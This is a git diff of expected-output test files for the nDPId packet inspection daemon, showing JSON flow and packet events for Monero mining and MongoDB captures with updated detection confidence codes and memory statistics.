+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196188350,"flow_last_seen":1514196188430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196188430,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1514196196437,"flow_last_seen":1514196196437,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1514196196437,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1514196196437,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1514196196437,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAA8ltZAAEAGxBLAqAKUdNOnw9JWDQXzKAOTAAAAAKACchCvSQAAAgQFtAQCCAqVhds1AAAAAAEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1514196196745,"pkt":"cIXCQ0+ifmgbW\/gUCABFAAA0AABAACEGefF006fDwKgClA0F0lYVgl9O8ygDlIASchDSRAAAAgQFpAEBBAIBAwMH"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1514196196745,"pkt":"fmgbW\/gUcIXCQ0+iCABFAAAoltdAAEAGxCXAqAKUdNOnw9JWDQXzKAOUFYJfT1AQAOWEMgAA"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1514196196437,"flow_last_seen":1514196196745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1514196196745,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":199,"source":"monero.pcap","alias":"nDPId-test","packets-captured":199,"packets-processed":198,"total-skipped-flows":0,"total-l4-payload-len":82647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1514196819733} -00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00921{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00920{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1514196196437,"flow_last_seen":1514197261597,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":7711,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"116.211.167.195","src_port":53846,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00921{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":272,"flow_first_seen":1514196188350,"flow_last_seen":1514197279769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":138379,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1514197279769,"l3_proto":"ip4","src_ip":"192.168.2.148","dst_ip":"94.23.199.191","src_port":46838,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":319,"source":"monero.pcap","alias":"nDPId-test","packets-captured":319,"packets-processed":319,"total-skipped-flows":0,"total-l4-payload-len":146090,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":1514197279769} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 319/319 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892058 bytes -~~ total memory freed........: 5892058 bytes -~~ total allocations/frees...: 118441/118441 +~~ total memory allocated....: 6025692 bytes +~~ total memory freed........: 6025692 bytes +~~ total allocations/frees...: 121203/121203 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 454 chars ~~ json string max len.......: 926 chars diff --git a/test/results/mongo_false_positive.pcapng.out b/test/results/mongo_false_positive.pcapng.out new file mode 100644 index 000000000..8442aff4d --- /dev/null +++ b/test/results/mongo_false_positive.pcapng.out @@ -0,0 +1,24 @@ +00473{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593581341477} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593581341477,"flow_last_seen":1593581341477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1593581341477,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593581341477,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593581341477,"pkt":"AAAAAAAAAAUAoyAkCABFAAA0JV9AAH8G7i28S7gU+7Z4IMGGAbvEY9K7AAAAAIACIAAM3AAAAgQFUAEDAwgBAQQC"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1593581341641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1593581341641,"pkt":"AAAAAAAAAAUAoyAkCABFAAA0AABAADIGYI37tnggvEu4FAG7wYZmWxUYxGPSvIAS\/\/+x9gAAAgQFtAEDAwYEAgAA"} +01739{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1593581341663,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":992,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":992,"pkt_l4_len":958,"thread_ts_msec":1593581341663,"pkt":"AAAAAAAAAAUAoyAkCABFAAPSJW1AAH8G6oG8S7gU+7Z4IMGGAbvEY9K8ZlsVGVAYAQRawwAAS0UAAAIGAVUAAAOeAQAAAI\/gqM9rhiEBAKoEmsOFlYhbJuU1bIo9gZTyPfuzEe6Bp0R1dekdpTM6J+UvhI\/atZONAg8NzlQZtu5ojbPV8zngZbQ4cMrOmnpw9tHIlOI54G8PoCZSSkCzTgVCUZhK6MJ5bEMhaGP8N7VRdGYUxlP3dzaquR9vVcn2XCbu1OyYr2d0f1ttQ9h3X1YHOEON1NdSoBGgqAG\/RHZ07sPa05Xl0UfvrDoaVlD5IET07FH8mSieF7FGedhv4Dj8+Qs2QRqvK1LVJAdhq+ZWqlrhFkDX0yKJTUfo3bbGz2SIZ\/XxVlL4engJDsc82rBIbEtS9RD4G6zaTKjota10U5LlxsWBv\/vF+LDG\/paIKhaHvmX8vMxet\/aPzSosJEi+YbJFZl+ktaTyXfc\/YvBACPyzDXq8dhIQ5EVoVoDF057eylaAp\/b4N7xUz0eIEWtWnaB0pI5aDo4niooDJSg17oEyP4wyEr\/dvj3gCHS3NSaxT2sQF2oI3lWoPKrC0p0TgCGwyk+8uc881xFgiaBcYR1Yq0b8s5nkKulFLZbepk3ixzHUGR38KIk34A5MFpTd4KumfzcRxc7\/mX4meETJikfhTvukqtqy2IYPW1+bRCNngFny3xkNjuE8UTx9apsSVjAbTJF+iDOEmtnFO33Z6kd1hnlmj+tmLxBU2U+7\/2yY34wwJqnOK7DcIcn8VN01WW8pn3XVPTYJNsveJbYtzxAN0QGn6elB1t+tkYz2AI\/bDfCljfqPz9Jhedr6TYt68rJMKvcBzN3Q0kn+ZV6lGIlXIjJihQ4kCBOwQwip+5E7YbzQz0\/EXg8j8I3XpkGddnOHbFEF94xKqghkO3CAwEE6UQtp7apLsuQt7+mbJJz9gWE69awD9rmmPEWE8YlOUDLu1N4GbHa5imN9wzwYR+eX3QagWTsU5MR8LmGzgISvHibhJ5ezVRBpd3CUbMW90\/iKKi474G30KMqYY2leCU0\/tizO+qE1KfBV3hd9rhEf7YOvS85zKOwuFIMuX\/INA9ydr5yFK2w5YCPYbOJJfQroAzWeXjFmHC\/dRCEeIjKkt28uWt0ZvpMtgYBxAWF\/Vuz\/pDAkp0VgXkELtbg760cvqlW4RdFlUHBSj6byX+5rUcEhuxN1Rj5iZNMiLbXNeywFcEIx0wl1FUA9pdx9eiII4CqBL1rzogzCSax9kM\/yFoBDH7LcCWZjzM+PnYkYE5zQ0GRHMuFNnbkl4+w="} +00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1593581341477,"flow_last_seen":1593581425923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1274,"flow_tot_l4_payload_len":10731,"flow_avg_l4_payload_len":412,"midstream":0,"thread_ts_msec":1593581425923,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00603{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1593581341477,"flow_last_seen":1593581425923,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1274,"flow_tot_l4_payload_len":10731,"flow_avg_l4_payload_len":412,"midstream":0,"thread_ts_msec":1593581425923,"l3_proto":"ip4","src_ip":"188.75.184.20","dst_ip":"251.182.120.32","src_port":49542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"mongo_false_positive.pcapng","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":10731,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593581425923} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 26/26 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 10731 bytes +~~ total detected protocols..: 0 +~~ total active/idle flows...: 1/1 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6005851 bytes +~~ total memory freed........: 6005851 bytes +~~ total allocations/frees...: 120902/120902 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 478 chars +~~ json string max len.......: 1744 chars +~~ json string avg len.......: 1073 chars diff --git a/test/results/mongodb.pcap.out b/test/results/mongodb.pcap.out index cd6ec9c5d..cd97c563e 100644 --- a/test/results/mongodb.pcap.out +++ b/test/results/mongodb.pcap.out @@ -4,36 +4,36 @@ 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1483459978959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFABsXAAIwgQABLAgARQAAQHp6QAA\/BrGvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1483459978959,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483459978959,"pkt":"LGv11hfFLGv11hfMgQAAMggARQAAQHp6QAA+BrKvCgoKCgoKCgvKbmmJmGzsIgAAAACwAv\/\/ouIAAAIEBVABAwMFAQEICm\/8XGwAAAAABAIAAA=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1483459979210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483459979210,"pkt":"ABsXAAIwACKDPxfFgQABLAgARQAAPAAAQAA1BjYuCgoKCwoKCgppicpuPpqGQZhs7COgEmjf5dgAAAIEBSYEAggKXOpDgG\/8XGwBAwMH"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483459979301,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":7,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":247,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1483558834969} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483558834969,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483558834969,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"AABeAAEBABsXAAIwgQABLAgARQAAQPlkQAA\/Bn5pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1483558834969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":82,"pkt_l4_len":44,"thread_ts_msec":1483558834969,"pkt":"PIqwbyfFPIqwbyfMgQAAMggARQAAQPlkQAA+Bn9pCgoKDAoKCg3ZHmmJO1oRNAAAAACwAv\/\/WNkAAAIEBVABAwMFAQEIChY4dS8AAAAABAIAAA=="} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1483558835050,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":78,"pkt_l4_len":40,"thread_ts_msec":1483558835050,"pkt":"ABsXAAIwPIqwbnfFgQABLAgARQAAPAAAQAA0BoLSCgoKDQoKCgxpidkeO6pi7TtaETWgEhagavwAAAIEBbQEAggKjPy8NBY4dS8BAwMJ"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1483558834969,"flow_last_seen":1483558835131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.12","dst_ip":"10.10.10.13","src_port":55582,"dst_port":27017,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1483459978959,"flow_last_seen":1483459979301,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1483558835131,"l3_proto":"ip4","src_ip":"10.10.10.10","dst_ip":"10.10.10.11","src_port":51822,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MongoDB","breed":"Acceptable","category":"Database"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1483726705497} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"mongodb.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1483726705497,"flow_last_seen":1483726705497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1483726705497,"l3_proto":"ip4","src_ip":"10.10.10.14","dst_ip":"10.10.10.15","src_port":61503,"dst_port":27017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 